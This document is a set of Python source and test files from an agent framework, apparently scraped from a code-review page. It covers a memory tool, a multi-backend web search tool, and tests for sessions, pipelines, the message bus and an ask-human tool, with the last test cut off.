    """Memory tool an Agent can call during a conversation.

    Lets the Agent read and modify the soul / user / memory / daily memory
    files provided by the injected ``MemoryStore``.
    """

    def __init__(self, memory_store: MemoryStore):
        super().__init__(
            name="memory",
            description="Read and write persistent memory files. Use to remember user preferences, project info, and notes across sessions.",
            input_schema={
                "type": "object",
                "properties": {
                    "action": {
                        "type": "string",
                        # Sorted so the schema is identical across processes;
                        # iterating a set of strings has no stable order.
                        "enum": sorted(VALID_ACTIONS),
                        "description": "Operation: add, replace, remove, read",
                    },
                    "file": {
                        "type": "string",
                        "enum": sorted(VALID_FILES),
                        "description": "Memory file: soul (agent identity), user (user profile), memory (work notes), daily (today's log)",
                    },
                    "section": {
                        "type": "string",
                        "description": "Section name within the file (e.g. '项目信息', '偏好')",
                    },
                    "content": {
                        "type": "string",
                        "description": "Content to add or new text for replace",
                    },
                    "old_text": {
                        "type": "string",
                        "description": "Text to find for replace action",
                    },
                    "new_text": {
                        "type": "string",
                        "description": "Replacement text for replace action",
                    },
                },
                "required": ["action", "file"],
            },
        )
        self._store = memory_store

    async def execute(self, **kwargs) -> dict[str, Any]:
        """Run one memory operation.

        Args:
            action: One of ``add``, ``replace``, ``remove``, ``read``.
            file: One of ``soul``, ``user``, ``memory``, ``daily``.
            section: Section name; required for add / replace / remove.
            content: Text to add; also accepted as the replacement text for
                ``replace`` when ``new_text`` is not given.
            old_text: Text to find; required for ``replace``.
            new_text: Replacement text for ``replace``.

        Returns:
            A dict with ``success``. On success it also carries ``content``
            (read) or ``message`` (other actions); on failure it carries
            ``error``. Exceptions raised by the store are reported the same
            way rather than propagated.
        """
        action = kwargs.get("action", "")
        file_key = kwargs.get("file", "")

        # Validate the selectors before touching the store.
        if file_key not in VALID_FILES:
            return {"success": False, "error": f"Invalid file: {file_key}. Must be one of {VALID_FILES}"}
        if action not in VALID_ACTIONS:
            return {"success": False, "error": f"Unknown action: {action}. Must be one of {VALID_ACTIONS}"}

        try:
            mf = self._store.get_file(file_key)

            if action == "read":
                content = mf.read()
                return {"success": True, "content": content}

            elif action == "add":
                section = kwargs.get("section", "")
                content = kwargs.get("content", "")
                if not section:
                    return {"success": False, "error": "section is required for add action"}
                mf.add_section(section, content)
                return {"success": True, "message": f"Added to {file_key}/{section}"}

            elif action == "replace":
                section = kwargs.get("section", "")
                old_text = kwargs.get("old_text", "")
                new_text = kwargs.get("new_text")
                if new_text is None:
                    # The schema advertises ``content`` as "new text for
                    # replace"; honour it so a caller following the schema
                    # does not silently replace the match with nothing.
                    new_text = kwargs.get("content") or ""
                if not section:
                    return {"success": False, "error": "section is required for replace action"}
                if not old_text:
                    return {"success": False, "error": "old_text is required for replace action"}
                success = mf.replace_section(section, old_text, new_text)
                if not success:
                    return {"success": False, "error": f"old_text not found in {file_key}/{section}"}
                return {"success": True, "message": f"Replaced in {file_key}/{section}"}

            elif action == "remove":
                section = kwargs.get("section", "")
                if not section:
                    return {"success": False, "error": "section is required for remove action"}
                mf.remove_section(section)
                return {"success": True, "message": f"Removed {file_key}/{section}"}

            return {"success": False, "error": f"Unhandled action: {action}"}

        except Exception as e:
            # Tool boundary: report the failure to the Agent instead of raising.
            return {"success": False, "error": str(e)}

View File

@ -0,0 +1,515 @@
"""WebSearchTool — 通用网页搜索工具。
支持多种搜索后端按优先级自动降级
1. Tavily API需要 API key质量最好
2. Serper API需要 API keyGoogle 搜索结果
3. DuckDuckGo Lite免费无需 API key降级方案
"""
import json
import logging
import re
import urllib.parse
from typing import Any
import httpx
from agentkit.tools.base import Tool
logger = logging.getLogger(__name__)
class WebSearchTool(Tool):
"""通用网页搜索工具。
支持三种后端，按优先级降级：
- Tavily API（高质量，需 key）
- Serper API（Google 结果，需 key）
- DuckDuckGo Lite（免费，降级方案）
"""
def __init__(
    self,
    name: str = "web_search",
    description: str = "搜索互联网信息。返回搜索结果列表，包含标题、链接和摘要。",
    input_schema: dict[str, Any] | None = None,
    output_schema: dict[str, Any] | None = None,
    version: str = "1.0.0",
    tags: list[str] | None = None,
    tavily_api_key: str | None = None,
    serper_api_key: str | None = None,
    default_max_results: int = 5,
):
    """Set up the tool metadata and remember the backend credentials.

    Falsy ``input_schema``, ``output_schema`` and ``tags`` arguments are
    replaced by the built-in defaults before the base initializer runs.

    Args:
        name: Tool name passed to the base class.
        description: Tool description passed to the base class.
        input_schema: Argument schema; the default schema is used if falsy.
        output_schema: Result schema; the default schema is used if falsy.
        version: Tool version string.
        tags: Tool tags; ``["search", "web"]`` is used if falsy.
        tavily_api_key: Stored as ``_tavily_key``.
        serper_api_key: Stored as ``_serper_key``.
        default_max_results: Stored as ``_default_max_results``.
    """
    if not input_schema:
        input_schema = self._default_input_schema()
    if not output_schema:
        output_schema = self._default_output_schema()
    if not tags:
        tags = ["search", "web"]

    super().__init__(
        name=name,
        description=description,
        input_schema=input_schema,
        output_schema=output_schema,
        version=version,
        tags=tags,
    )

    self._default_max_results = default_max_results
    self._serper_key = serper_api_key
    self._tavily_key = tavily_api_key
@staticmethod
def _default_input_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"query": {
"type": "string",
"description": "搜索关键词",
},
"max_results": {
"type": "integer",
"description": "最大返回结果数(默认 5",
"default": 5,
},
},
"required": ["query"],
}
@staticmethod
def _default_output_schema() -> dict[str, Any]:
return {
"type": "object",
"properties": {
"results": {
"type": "array",
"items": {
"type": "object",
"properties": {
"title": {"type": "string"},
"url": {"type": "string"},
"snippet": {"type": "string"},
},
},
"description": "搜索结果列表",
},
"total": {"type": "integer", "description": "结果总数"},
"backend": {"type": "string", "description": "使用的搜索后端"},
"success": {"type": "boolean", "description": "是否成功"},
"error": {"type": "string", "description": "错误信息(仅失败时)"},
},
}
async def execute(self, **kwargs) -> dict:
    """Run a web search, trying the configured backends in priority order.

    Tavily is tried first when a Tavily key is set, then Serper when a
    Serper key is set; the DuckDuckGo fallback chain is used otherwise or
    when the keyed backends report failure.

    Keyword Args:
        query: Search terms. Required; blank strings are rejected.
        max_results: Maximum number of hits. Missing, non-numeric or
            non-positive values fall back to the instance default so the
            backends always receive a usable positive integer.

    Returns:
        The result dict of the first backend reporting success, or the
        dict returned by the DuckDuckGo fallback. A missing query yields a
        failure dict without contacting any backend.
    """
    query = kwargs.get("query")
    if isinstance(query, str):
        query = query.strip()
    if not query:
        return {"error": "query 参数是必需的", "results": [], "total": 0, "success": False}

    # Tool arguments come from an LLM and may be null, a string or negative;
    # downstream code slices with and compares against this value.
    try:
        max_results = int(kwargs.get("max_results"))
    except (TypeError, ValueError, OverflowError):
        max_results = self._default_max_results
    if max_results < 1:
        max_results = self._default_max_results

    if self._tavily_key:
        result = await self._search_tavily(query, max_results)
        if result.get("success"):
            return result
        logger.warning("Tavily search failed, falling back: %s", result.get("error"))

    if self._serper_key:
        result = await self._search_serper(query, max_results)
        if result.get("success"):
            return result
        logger.warning("Serper search failed, falling back: %s", result.get("error"))

    # Free fallback that needs no API key.
    return await self._search_duckduckgo(query, max_results)
async def _search_tavily(self, query: str, max_results: int) -> dict:
    """Query the Tavily search API.

    Args:
        query: Search terms.
        max_results: Maximum number of hits to request and return.

    Returns:
        On success a dict with ``results``, ``total``, ``backend`` and
        ``success=True``. On any error a failure dict carrying the error
        text; exceptions are deliberately not propagated so the caller can
        fall back to another backend.
    """
    try:
        async with httpx.AsyncClient(timeout=15) as client:
            resp = await client.post(
                "https://api.tavily.com/search",
                json={
                    "api_key": self._tavily_key,
                    "query": query,
                    "max_results": max_results,
                    "search_depth": "basic",
                },
            )
            resp.raise_for_status()
            data = resp.json()
        # ``or`` guards against fields that are present but null, which
        # would otherwise make the slice below raise and fail the search.
        results = [
            {
                "title": item.get("title") or "",
                "url": item.get("url") or "",
                "snippet": (item.get("content") or "")[:300],
            }
            for item in (data.get("results") or [])[:max_results]
        ]
        return {"results": results, "total": len(results), "backend": "tavily", "success": True}
    except Exception as e:
        logger.error("Tavily search error: %s", e)
        # Include the backend so failures are shaped like the other backends'.
        return {
            "error": str(e),
            "results": [],
            "total": 0,
            "backend": "tavily",
            "success": False,
        }
async def _search_serper(self, query: str, max_results: int) -> dict:
    """Query the Serper (Google results) API.

    Args:
        query: Search terms.
        max_results: Maximum number of hits to request and return.

    Returns:
        On success a dict with ``results``, ``total``, ``backend`` and
        ``success=True``. On any error a failure dict carrying the error
        text; exceptions are deliberately not propagated so the caller can
        fall back to another backend.
    """
    try:
        async with httpx.AsyncClient(timeout=15) as client:
            resp = await client.post(
                "https://google.serper.dev/search",
                json={"q": query, "num": max_results},
                headers={"X-API-KEY": self._serper_key},
            )
            resp.raise_for_status()
            data = resp.json()
        # ``or`` guards against fields that are present but null, which
        # would otherwise make the slice below raise and fail the search.
        results = [
            {
                "title": item.get("title") or "",
                "url": item.get("link") or "",
                "snippet": (item.get("snippet") or "")[:300],
            }
            for item in (data.get("organic") or [])[:max_results]
        ]
        return {"results": results, "total": len(results), "backend": "serper", "success": True}
    except Exception as e:
        logger.error("Serper search error: %s", e)
        # Include the backend so failures are shaped like the other backends'.
        return {
            "error": str(e),
            "results": [],
            "total": 0,
            "backend": "serper",
            "success": False,
        }
async def _search_duckduckgo(self, query: str, max_results: int) -> dict:
"""DuckDuckGo search (free, no API key needed).
Strategy:
1. Try HTML search (may be blocked by anti-bot)
2. Try Instant Answer API with original query
3. Try Instant Answer API with translated English query (for Chinese queries)
4. Try Bing search as final fallback
"""
try:
# Try HTML search first (more results when available)
result = await self._search_duckduckgo_html(query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# Try Instant Answer API with original query
result = await self._search_duckduckgo_instant(query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# For Chinese queries, try translating key terms to English
if self._contains_cjk(query):
english_query = self._cjk_to_english_hint(query)
if english_query != query:
logger.info(f"Retrying DuckDuckGo with English query: {english_query}")
result = await self._search_duckduckgo_instant(english_query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# Final fallback: try Bing search
result = await self._search_bing(query, max_results)
if result.get("success") and result.get("total", 0) > 0:
return result
# Return whatever we have (may be empty)
return result
except Exception as e:
logger.error(f"DuckDuckGo search error: {e}")
return {
"error": f"Search unavailable: {e}",
"results": [],
"total": 0,
"backend": "duckduckgo",
"success": False,
}
@staticmethod
def _contains_cjk(text: str) -> bool:
"""Check if text contains CJK characters."""
for ch in text:
if '\u4e00' <= ch <= '\u9fff' or '\u3040' <= ch <= '\u309f' or '\u30a0' <= ch <= '\u30ff':
return True
return False
@staticmethod
def _cjk_to_english_hint(query: str) -> str:
"""Simple CJK-to-English keyword mapping for better DuckDuckGo results."""
# Common Chinese query patterns to English
mappings = {
"是什么": "definition meaning",
"什么意思": "meaning definition",
"怎么": "how to",
"为什么": "why",
"如何": "how to",
"搜索": "",
"查一下": "",
"帮我": "",
"": "",
}
result = query
for cn, en in mappings.items():
result = result.replace(cn, f" {en} ")
# Remove extra spaces
result = " ".join(result.split())
return result if result.strip() else query
async def _search_duckduckgo_html(self, query: str, max_results: int) -> dict:
    """Fetch the DuckDuckGo HTML results page and parse it.

    The standard parser runs first; the alternative parser is used only
    when the standard one finds nothing. Any exception is turned into a
    failure dict.
    """
    browser_headers = {
        "User-Agent": (
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/120.0.0.0 Safari/537.36"
        ),
    }
    try:
        target = "https://html.duckduckgo.com/html/?q=" + urllib.parse.quote(query)
        async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client:
            response = await client.get(target, headers=browser_headers)
            page = response.text
        hits = self._parse_duckduckgo_html(page, max_results)
        if not hits:
            # Different markup variant: try the alternative patterns.
            hits = self._parse_duckduckgo_html_alt(page, max_results)
        return {"results": hits, "total": len(hits), "backend": "duckduckgo", "success": True}
    except Exception as e:
        logger.error(f"DuckDuckGo HTML search error: {e}")
        return {"error": str(e), "results": [], "total": 0, "backend": "duckduckgo", "success": False}
async def _search_duckduckgo_instant(self, query: str, max_results: int) -> dict:
    """Query the DuckDuckGo Instant Answer API and flatten its answer.

    Results are collected from the ``Abstract`` field, then from
    ``RelatedTopics`` entries that carry a ``Text`` key, then from at most
    the first two ``Infobox`` content items with a truthy ``value``. Any
    exception is turned into a failure dict.
    """
    try:
        endpoint = (
            "https://api.duckduckgo.com/?q="
            + urllib.parse.quote(query)
            + "&format=json&no_html=1&skip_disambig=0"
        )
        async with httpx.AsyncClient(timeout=10) as client:
            response = await client.get(endpoint)
            response.raise_for_status()
            payload = response.json()

        hits = []

        # Direct answer, if the API returned one.
        summary = payload.get("Abstract")
        if summary:
            hits.append({
                "title": payload.get("Heading", query),
                "url": payload.get("AbstractURL", ""),
                "snippet": summary[:300],
            })

        # Related topics; entries without a "Text" key are skipped.
        for topic in payload.get("RelatedTopics", [])[:max_results]:
            if len(hits) >= max_results:
                break
            if not isinstance(topic, dict) or "Text" not in topic:
                continue
            hits.append({
                "title": topic.get("Text", "")[:80],
                "url": topic.get("FirstURL", ""),
                "snippet": topic.get("Text", "")[:300],
            })

        # Infobox facts, limited to the first two entries.
        infobox = payload.get("Infobox")
        if infobox and isinstance(infobox, dict):
            for entry in infobox.get("content", [])[:2]:
                if len(hits) >= max_results:
                    break
                if isinstance(entry, dict) and entry.get("value"):
                    hits.append({
                        "title": entry.get("label", ""),
                        "url": "",
                        "snippet": str(entry.get("value", ""))[:300],
                    })

        return {"results": hits, "total": len(hits), "backend": "duckduckgo_instant", "success": True}
    except Exception as e:
        logger.error(f"DuckDuckGo Instant API error: {e}")
        return {"error": str(e), "results": [], "total": 0, "backend": "duckduckgo_instant", "success": False}
async def _search_bing(self, query: str, max_results: int) -> dict:
    """Fetch the Bing results page with browser-like headers and parse it.

    Needs no API key. Any exception is turned into a failure dict.
    """
    browser_headers = {
        "User-Agent": (
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
        ),
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
    }
    try:
        quoted = urllib.parse.quote(query)
        target = f"https://www.bing.com/search?q={quoted}&count={max_results}"
        async with httpx.AsyncClient(timeout=15, follow_redirects=True) as client:
            response = await client.get(target, headers=browser_headers)
            page = response.text
        hits = self._parse_bing_html(page, max_results)
        return {"results": hits, "total": len(hits), "backend": "bing", "success": True}
    except Exception as e:
        logger.error(f"Bing search error: {e}")
        return {"error": str(e), "results": [], "total": 0, "backend": "bing", "success": False}
@staticmethod
def _parse_bing_html(html: str, max_results: int) -> list[dict[str, str]]:
"""Parse Bing search results HTML."""
results: list[dict[str, str]] = []
# Bing uses <li class="b_algo"> for organic results
# Title: <h2><a href="...">title</a></h2>
# Snippet: <p class="b_lineclamp2"> or <div class="b_caption"><p>
algo_pattern = re.compile(
r'<li[^>]*class="b_algo"[^>]*>(.*?)</li>',
re.DOTALL,
)
link_pattern = re.compile(
r'<h2[^>]*>\s*<a[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<p[^>]*>(.*?)</p>',
re.DOTALL,
)
for algo_match in algo_pattern.finditer(html):
if len(results) >= max_results:
break
block = algo_match.group(1)
link_match = link_pattern.search(block)
if not link_match:
continue
url = link_match.group(1)
title = re.sub(r"<[^>]+>", "", link_match.group(2)).strip()
if not title or not url.startswith("http"):
continue
snippet = ""
snippet_match = snippet_pattern.search(block[link_match.end():])
if snippet_match:
snippet = re.sub(r"<[^>]+>", "", snippet_match.group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
return results
@staticmethod
def _parse_duckduckgo_html(html: str, max_results: int) -> list[dict[str, str]]:
"""Parse DuckDuckGo HTML search results."""
results: list[dict[str, str]] = []
# Pattern for html.duckduckgo.com: <a class="result__a" href="...">title</a>
link_pattern = re.compile(
r'<a[^>]*class="result__a"[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<a[^>]*class="result__snippet"[^>]*>(.*?)</a>',
re.DOTALL,
)
links = list(link_pattern.finditer(html))
snippets = list(snippet_pattern.finditer(html))
for i, match in enumerate(links):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
# Skip ad/tracking links
if not url.startswith("http") or "duckduckgo.com" in url:
continue
snippet = ""
if i < len(snippets):
snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
return results
@staticmethod
def _parse_duckduckgo_html_alt(html: str, max_results: int) -> list[dict[str, str]]:
"""Alternative DuckDuckGo HTML parser for lite/html variants."""
results: list[dict[str, str]] = []
# Pattern for lite.duckduckgo.com
link_pattern = re.compile(
r'<a[^>]*class="result-link"[^>]*href="([^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
snippet_pattern = re.compile(
r'<td[^>]*class="result-snippet"[^>]*>(.*?)</td>',
re.DOTALL,
)
links = list(link_pattern.finditer(html))
snippets = list(snippet_pattern.finditer(html))
for i, match in enumerate(links):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if not url.startswith("http") or "duckduckgo.com" in url:
continue
snippet = ""
if i < len(snippets):
snippet = re.sub(r"<[^>]+>", "", snippets[i].group(1)).strip()
results.append({
"title": title[:200],
"url": url,
"snippet": snippet[:300],
})
# If still no results, try generic <a> with href containing external URLs
if not results:
generic_pattern = re.compile(
r'<a[^>]*href="(https?://(?!duckduckgo\.com)[^"]*)"[^>]*>(.*?)</a>',
re.DOTALL,
)
for match in generic_pattern.finditer(html):
if len(results) >= max_results:
break
url = match.group(1)
title = re.sub(r"<[^>]+>", "", match.group(2)).strip()
if title and len(title) > 5:
results.append({
"title": title[:200],
"url": url,
"snippet": "",
})
return results

View File

@ -0,0 +1,236 @@
"""Integration tests for Chat + Adaptive + Multi-Agent features (U8).
End-to-end tests that verify the new Phase 8 capabilities work together:
- Chat mode with session management
- Adaptive pipeline execution with reflection
- Multi-Agent communication via MessageBus
"""
import asyncio
import pytest
from datetime import datetime, timezone
from unittest.mock import AsyncMock, MagicMock
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.bus.message import AgentMessage
from agentkit.core.orchestrator import Orchestrator, OrchestratorConfig
from agentkit.core.protocol import TaskMessage, TaskStatus
from agentkit.orchestrator.pipeline_engine import PipelineEngine
from agentkit.orchestrator.pipeline_schema import (
AdaptiveConfig,
Pipeline,
PipelineStage,
StageStatus,
)
from agentkit.session.manager import SessionManager
from agentkit.session.models import MessageRole
from agentkit.session.store import InMemorySessionStore
# ── Chat + Session Integration ────────────────────────────
class TestChatSessionIntegration:
    """Session manager behaviour across a whole conversation."""

    @pytest.mark.asyncio
    async def test_session_lifecycle_with_messages(self):
        """Create a session, exchange messages, then pause, resume and close it."""
        manager = SessionManager(store=InMemorySessionStore())

        session = await manager.create_session(agent_name="test_agent")
        assert session is not None
        sid = session.session_id

        conversation = [
            (MessageRole.USER, "Hello"),
            (MessageRole.ASSISTANT, "Hi there!"),
            (MessageRole.USER, "How are you?"),
        ]
        for role, text in conversation:
            await manager.append_message(sid, role=role, content=text)

        # Raw stored messages.
        stored = await manager.get_messages(sid)
        assert len(stored) == 3

        # The same history in the shape handed to the LLM.
        llm_view = await manager.get_chat_messages(sid)
        assert len(llm_view) == 3
        assert llm_view[0]["role"] == "user"

        paused = await manager.pause_session(sid)
        assert paused.status.value == "paused"

        resumed = await manager.resume_session(sid)
        assert resumed.status.value == "active"

        closed = await manager.close_session(sid)
        assert closed.status.value == "closed"

    @pytest.mark.asyncio
    async def test_closed_session_rejects_messages(self):
        """Appending to a closed session raises ValueError."""
        manager = SessionManager(store=InMemorySessionStore())
        sid = (await manager.create_session(agent_name="test_agent")).session_id
        await manager.close_session(sid)

        with pytest.raises(ValueError, match="closed"):
            await manager.append_message(sid, role=MessageRole.USER, content="test")
# ── Adaptive Pipeline Integration ─────────────────────────
class TestAdaptivePipelineIntegration:
    """Pipeline engine runs with and without an adaptive configuration."""

    @pytest.mark.asyncio
    async def test_pipeline_succeeds_without_adaptive(self):
        """A two-stage pipeline completes when no adaptive config is passed."""
        stages = [
            PipelineStage(name="step1", agent="a", action="do"),
            PipelineStage(name="step2", agent="b", action="do"),
        ]
        pipeline = Pipeline(
            name="test_pipeline",
            version="1.0",
            description="Test",
            stages=stages,
        )
        # No arguments: the engine runs in dry-run mode.
        outcome = await PipelineEngine().execute(pipeline)
        assert outcome.status == StageStatus.COMPLETED

    @pytest.mark.asyncio
    async def test_pipeline_adaptive_config_default_disabled(self):
        """A default-constructed AdaptiveConfig is disabled."""
        assert AdaptiveConfig().enabled is False

    @pytest.mark.asyncio
    async def test_circular_dependency_fails_gracefully(self):
        """Two stages depending on each other produce a FAILED result."""
        stages = [
            PipelineStage(name="a", agent="x", action="do", depends_on=["b"]),
            PipelineStage(name="b", agent="y", action="do", depends_on=["a"]),
        ]
        pipeline = Pipeline(
            name="circular",
            version="1.0",
            description="Circular",
            stages=stages,
        )
        adaptive = AdaptiveConfig(enabled=True, max_reflections=2)
        outcome = await PipelineEngine().execute(pipeline, adaptive_config=adaptive)
        assert outcome.status == StageStatus.FAILED
# ── Multi-Agent Communication Integration ─────────────────
class TestMultiAgentCommunication:
    """Message-bus communication between orchestrator, workers and agents."""

    @pytest.mark.asyncio
    async def test_worker_publishes_progress_to_orchestrator(self):
        """Executing a task publishes a progress message to the orchestrator."""
        bus = InMemoryMessageBus()

        # Mock agent pool exposing a single worker agent.
        mock_agent = AsyncMock()
        mock_result = MagicMock()
        mock_result.output_data = {"analysis": "complete"}
        mock_agent.execute = AsyncMock(return_value=mock_result)
        pool = MagicMock()
        pool.get_agent = lambda name: mock_agent
        pool.list_agents = lambda: [
            {"name": "analyst", "agent_type": "worker", "description": "Analyst"},
        ]
        orch = Orchestrator(agent_pool=pool, message_bus=bus)

        progress: list[AgentMessage] = []

        # Use a coroutine handler like every other subscriber in these
        # tests; a plain lambda returns None, which a bus that awaits its
        # handlers cannot await.
        async def on_progress(msg: AgentMessage):
            progress.append(msg)

        await bus.subscribe("orchestrator", on_progress)

        task = TaskMessage(
            task_id="t1",
            agent_name="analyst",
            task_type="analyze",
            priority=0,
            input_data={"data": "test"},
            callback_url=None,
            created_at=datetime.now(timezone.utc),
            timeout_seconds=60,
        )
        result = await orch.execute(task)
        assert result.status == TaskStatus.COMPLETED

        # Give the bus time to deliver before inspecting the inbox.
        await asyncio.sleep(0.2)
        assert len(progress) >= 1
        assert progress[0].topic == "task.progress"

    @pytest.mark.asyncio
    async def test_agent_to_agent_communication(self):
        """A message addressed to agent B reaches B and not A."""
        bus = InMemoryMessageBus()
        received_by_a: list[AgentMessage] = []
        received_by_b: list[AgentMessage] = []

        async def handler_a(msg: AgentMessage):
            received_by_a.append(msg)

        async def handler_b(msg: AgentMessage):
            received_by_b.append(msg)

        await bus.subscribe("agent_a", handler_a)
        await bus.subscribe("agent_b", handler_b)

        await bus.publish(AgentMessage(
            sender="agent_a",
            recipient="agent_b",
            topic="task.result",
            payload={"output": "analysis complete"},
        ))
        await asyncio.sleep(0.1)

        assert len(received_by_b) == 1
        assert received_by_b[0].payload["output"] == "analysis complete"
        assert len(received_by_a) == 0  # Not addressed to A
# ── Config Integration ────────────────────────────────────
class TestConfigIntegration:
    """Configuration objects used by the adaptive orchestrator."""

    def test_adaptive_config_serialization(self):
        """``model_dump`` exposes the values AdaptiveConfig was built with."""
        dumped = AdaptiveConfig(
            enabled=True,
            max_reflections=5,
            reflection_model="deepseek/deepseek-chat",
            skip_stages=["cleanup"],
        ).model_dump()

        assert dumped["enabled"] is True
        assert dumped["max_reflections"] == 5
        assert "cleanup" in dumped["skip_stages"]

    def test_orchestrator_config_serialization(self):
        """OrchestratorConfig keeps the values it was constructed with."""
        settings = OrchestratorConfig(
            adaptive=True,
            max_iterations=5,
            quality_threshold=0.9,
        )

        assert settings.adaptive is True
        assert settings.max_iterations == 5
        assert settings.quality_threshold == 0.9

View File

@ -0,0 +1,100 @@
"""Tests for AskHumanTool."""
import asyncio
import pytest
from agentkit.tools.ask_human import AskHumanTool
class TestAskHumanToolBasic:
    """AskHumanTool metadata and its behaviour when not configured for chat."""

    def test_tool_properties(self):
        """The tool is named ``ask_human`` and requires only ``question``."""
        ask = AskHumanTool()
        assert ask.name == "ask_human"
        assert "question" in str(ask.parameters)
        assert ask.parameters["required"] == ["question"]

    @pytest.mark.asyncio
    async def test_no_chat_mode_returns_default(self):
        """Without options the unconfigured tool replies ``confirmed``."""
        answer = await AskHumanTool().execute(question="What should I do?")
        assert answer == {"reply": "confirmed"}

    @pytest.mark.asyncio
    async def test_no_chat_mode_with_options(self):
        """With options the unconfigured tool replies with the first one."""
        answer = await AskHumanTool().execute(question="Choose:", options=["A", "B", "C"])
        assert answer == {"reply": "A"}
class TestAskHumanToolChatMode:
    """AskHumanTool behaviour once configured with a reply channel."""

    @pytest.mark.asyncio
    async def test_ask_and_receive_reply(self):
        """The question is pushed to the callback and the reply is returned."""
        ask = AskHumanTool(timeout=5.0)
        pending: dict[str, asyncio.Future] = {}
        asked: list[tuple[str, str, list[str] | None]] = []

        async def record_question(request_id, question, options):
            asked.append((request_id, question, options))

        ask.configure(pending_replies=pending, ask_callback=record_question)

        # Run execute() in the background so the test can answer it.
        running = asyncio.create_task(
            ask.execute(question="Continue?", options=["yes", "no"])
        )
        await asyncio.sleep(0.1)

        assert len(asked) == 1
        request_id = asked[0][0]
        assert asked[0][1] == "Continue?"
        assert asked[0][2] == ["yes", "no"]

        # Simulate the user's answer.
        assert request_id in pending
        pending[request_id].set_result("yes")

        assert await running == {"reply": "yes"}

    @pytest.mark.asyncio
    async def test_timeout_returns_default(self):
        """On timeout with options, the first option is returned."""
        ask = AskHumanTool(timeout=0.1)
        pending: dict[str, asyncio.Future] = {}

        async def never_reply(request_id, question, options):
            pass

        ask.configure(pending_replies=pending, ask_callback=never_reply)
        answer = await ask.execute(question="Continue?", options=["yes", "no"])
        assert answer == {"reply": "yes"}

    @pytest.mark.asyncio
    async def test_timeout_no_options(self):
        """On timeout without options, the reply mentions the timeout."""
        ask = AskHumanTool(timeout=0.1)
        pending: dict[str, asyncio.Future] = {}

        async def never_reply(request_id, question, options):
            pass

        ask.configure(pending_replies=pending, ask_callback=never_reply)
        answer = await ask.execute(question="Continue?")
        assert "timeout" in answer["reply"]

    @pytest.mark.asyncio
    async def test_cleanup_on_reply(self):
        """The pending-replies dict is empty once a reply has been consumed."""
        ask = AskHumanTool(timeout=5.0)
        pending: dict[str, asyncio.Future] = {}

        async def reply_shortly(request_id, question, options):
            # Answer from inside the callback after a short delay.
            await asyncio.sleep(0.05)
            pending[request_id].set_result("ok")

        ask.configure(pending_replies=pending, ask_callback=reply_shortly)
        await ask.execute(question="Test?")
        assert len(pending) == 0

View File

@ -0,0 +1,183 @@
"""Tests for MessageBus (U6) — InMemory implementation and message model."""
import asyncio
import pytest
from agentkit.bus.message import AgentMessage
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.bus.redis_bus import create_message_bus
# ── AgentMessage Tests ────────────────────────────────────
class TestAgentMessage:
    """Field defaults, addressing and serialization of AgentMessage."""

    def test_default_values(self):
        """Only the sender is set; everything else takes its default."""
        message = AgentMessage(sender="agent_a")
        assert message.message_id
        assert message.sender == "agent_a"
        assert message.recipient is None
        assert message.topic == ""
        assert message.payload == {}
        assert message.correlation_id is None
        assert message.is_broadcast is True

    def test_point_to_point(self):
        """A message with a recipient is not a broadcast."""
        message = AgentMessage(sender="a", recipient="b", topic="test")
        assert message.is_broadcast is False

    def test_to_dict_and_from_dict(self):
        """A message survives a to_dict / from_dict round trip."""
        original = AgentMessage(
            sender="a",
            recipient="b",
            topic="result",
            payload={"key": "value"},
            correlation_id="corr-123",
        )
        clone = AgentMessage.from_dict(original.to_dict())
        assert clone.sender == "a"
        assert clone.recipient == "b"
        assert clone.topic == "result"
        assert clone.payload == {"key": "value"}
        assert clone.correlation_id == "corr-123"

    def test_unique_message_ids(self):
        """One hundred fresh messages carry one hundred distinct ids."""
        seen = set()
        for _ in range(100):
            seen.add(AgentMessage().message_id)
        assert len(seen) == 100
# ── InMemoryMessageBus Tests ──────────────────────────────
class TestInMemoryMessageBus:
    """Delivery semantics of the in-memory message bus."""

    @staticmethod
    def _collector():
        """Return an inbox list and a coroutine handler that appends to it."""
        inbox: list[AgentMessage] = []

        async def handler(msg: AgentMessage):
            inbox.append(msg)

        return inbox, handler

    @pytest.mark.asyncio
    async def test_point_to_point_delivery(self):
        """Agent A sends a message to agent B and B receives it."""
        bus = InMemoryMessageBus()
        inbox, handler = self._collector()
        await bus.subscribe("agent_b", handler)

        await bus.publish(AgentMessage(
            sender="agent_a", recipient="agent_b",
            topic="test", payload={"data": "hello"},
        ))
        # Give the consumer task time to process.
        await asyncio.sleep(0.1)

        assert len(inbox) == 1
        assert inbox[0].payload["data"] == "hello"

    @pytest.mark.asyncio
    async def test_broadcast_delivery(self):
        """A broadcast reaches every subscriber."""
        bus = InMemoryMessageBus()
        inbox_a, handler_a = self._collector()
        inbox_b, handler_b = self._collector()
        await bus.subscribe("agent_a", handler_a)
        await bus.subscribe("agent_b", handler_b)

        await bus.broadcast(AgentMessage(
            sender="orchestrator", topic="status",
            payload={"status": "started"},
        ))

        assert len(inbox_a) == 1
        assert len(inbox_b) == 1

    @pytest.mark.asyncio
    async def test_request_response(self):
